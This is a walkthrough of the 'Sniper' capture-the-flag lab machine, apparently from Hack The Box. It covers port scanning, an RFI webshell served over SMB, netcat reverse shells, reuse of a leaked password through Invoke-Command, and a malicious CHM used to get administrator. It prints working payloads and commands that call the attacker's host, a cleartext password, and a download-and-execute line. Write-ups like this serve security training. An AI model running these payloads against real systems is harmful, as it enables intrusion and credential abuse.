Sniper
As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on them.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.151 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scanning the entire port range, from 1 to 65535.
-T5
insane mode, it is the fastest mode of the nmap time template.
-Pn
assume the host is online.
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135,139,445,49667 10.10.10.151 -oN targeted
-sC
performs the scan using the default set of scripts.
-sV
enables version detection.
-oN
save the scan result into file, in this case the targeted file.
The Sniper Co. website has a few links, but only the Services link and the User Portal work. The Services link goes to the /blog/index.php page.
We can choose the language of the site; the PHP file for that language is then loaded through the lang GET parameter.
As we know this is a Windows machine, we could try to exploit a local file inclusion in the lang parameter by supplying the path of the Windows hosts file (the equivalent of /etc/hosts on Linux). The leading backslash makes the path relative to the root of the current drive, so no drive letter is needed:
http://10.10.10.151/blog/?lang=\Windows\System32\Drivers\etc\hosts
Now that we know that it is vulnerable to LFI, we can try Remote File Inclusion (RFI). Since it is a Windows machine running PHP, include() accepts a UNC path as an ordinary filesystem path even when allow_url_include is off (the Windows SMB client fetches the file, not PHP's URL wrappers), so let's create a PHP webshell and share it over SMB:
echo '<?php system($_GET["cmd"]);?>' > pwn.php
impacket-smbserver smbFolder $(pwd) -smb2support
Now, if we try to retrieve pwn.php from our SMB server, we'll see that it does not work:
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
This sometimes happens because of authentication issues between the Windows SMB client and impacket's server. We can instead share the directory with Samba's net usershare (if the share is still not reachable as guest, check that usershare allow guests = yes is set in smb.conf):
service smbd start
net usershare add smbFolder $(pwd) '' 'Everyone:F' 'guest_ok=y'
Now it should work, and we should be able to run commands as nt authority\iusr:
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
Time to get a shell. First, copy the nc.exe binary from SecLists into our current directory (the one shared over SMB):
cp /opt/SecLists/Web-Shells/FuzzDB/nc.exe .
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
Finally, send a reverse shell to the netcat listener using the nc.exe binary shared through our SMB server:
view-source:10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444
If we go back one directory and go to C:\inetpub\wwwroot\user, we'll see a file called db.php with some database credentials:
type \inetpub\wwwroot\user\db.php
As seen below, there is one user called Chris:
net user
We could try to see if he is reusing the same password as the database user. Let's get a PowerShell prompt and try to run commands as Chris by creating a PSCredential and using Invoke-Command (which goes through WinRM even on the local host, so the name printed by hostname is what we pass to -ComputerName):
powershell
hostname
$user = "Sniper\chris"
$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { whoami }
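The same check, generalized to every local account and wrapped in error handling so that a wrong password is reported instead of aborting the session, as an added example that is not part of the original writeup. It assumes the password recovered from db.php above and the account names listed by net user; the Test-PasswordReuse function and the $candidates list are this example's own, and Administrator is included only because it exists on every Windows host.

```powershell
# Added example (not from the original writeup): test whether the password
# recovered from db.php is reused by local accounts. The function name and
# the $candidates list are assumptions of this example.
function Test-PasswordReuse {
    param(
        [Parameter(Mandatory)][string[]]$Users,
        [Parameter(Mandatory)][string]$Password,
        [string]$ComputerName = $env:COMPUTERNAME   # same value `hostname` printed
    )
    $secure = ConvertTo-SecureString $Password -AsPlainText -Force
    foreach ($u in $Users) {
        $cred = New-Object System.Management.Automation.PSCredential("$ComputerName\$u", $secure)
        try {
            # Invoke-Command goes through WinRM even on the local host, so this
            # is a real logon with the supplied credential, not a no-op.
            $who = Invoke-Command -Credential $cred -ComputerName $ComputerName `
                                  -ScriptBlock { whoami } -ErrorAction Stop
            [pscustomobject]@{ User = $u; Valid = $true;  RunsAs = $who }
        } catch {
            # Logon failure / access denied surfaces here; report it and keep going.
            $reason = ($_.Exception.Message -split "`n")[0]
            [pscustomobject]@{ User = $u; Valid = $false; RunsAs = $reason }
        }
    }
}

# Accounts seen in `net user` (Administrator assumed present); password from db.php.
$candidates = 'Administrator', 'chris'
Test-PasswordReuse -Users $candidates -Password '36mEAhz/B8xQ~2VM' | Format-Table -AutoSize
```

One attempt per account with a single known password will not trip a lockout policy, but before trying more than one password on a domain-joined host check the threshold with net accounts first.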
As we can run commands as chris, let's get a reverse shell as him. First, set another netcat listener on port 5555.
rlwrap nc -lvnp 5555
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
Then send the reverse shell using Invoke-Command. After that, we'll be able to grab the user flag.
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Taking a look at the directories, we'll see that there is a directory called Docs with a file called note.txt:
dir \docs
The note says something about putting some file in that directory:
type \docs\note.txt
In fact, if we take a look in the Downloads folder of chris, we'll see a .chm file, which suggests that the Sniper CEO opens CHM files and is waiting for one in the Docs directory:
dir \users\chris\downloads
We could create a malicious CHM and drop it in the Docs directory, so that when someone opens it, it sends us a reverse shell as that user. To compile this kind of file we need Microsoft HTML Help Workshop installed on a Windows machine; download the installer from Microsoft.
We can build the malicious CHM with a custom payload using the Out-CHM.ps1 script from nishang. On our Windows machine, import the script with PowerShell (turn off Windows Defender first, since it flags nishang scripts):
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1')
Then compile the CHM with a payload that sends us a reverse shell on port 6666 using the nc.exe binary that we will place in C:\Docs:
Out-CHM -Payload "C:\Docs\nc.exe -e cmd 10.10.14.11 6666" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
This creates the doc.chm file. Transfer it to our Linux machine (into the smbFolder share), then, from the chris shell on the target, change into C:\Docs and copy it there together with the nc.exe binary. The CHM's payload references C:\Docs\nc.exe, so nc.exe must be in place before anyone opens the document:
copy \\10.10.14.11\smbFolder\nc.exe
copy \\10.10.14.11\smbFolder\doc.chm
dir
Finally, set a netcat listener on port 6666 and wait for the reverse shell as the administrator. Then all we have to do is reap the harvest and take the root flag.
rlwrap nc -lvnp 6666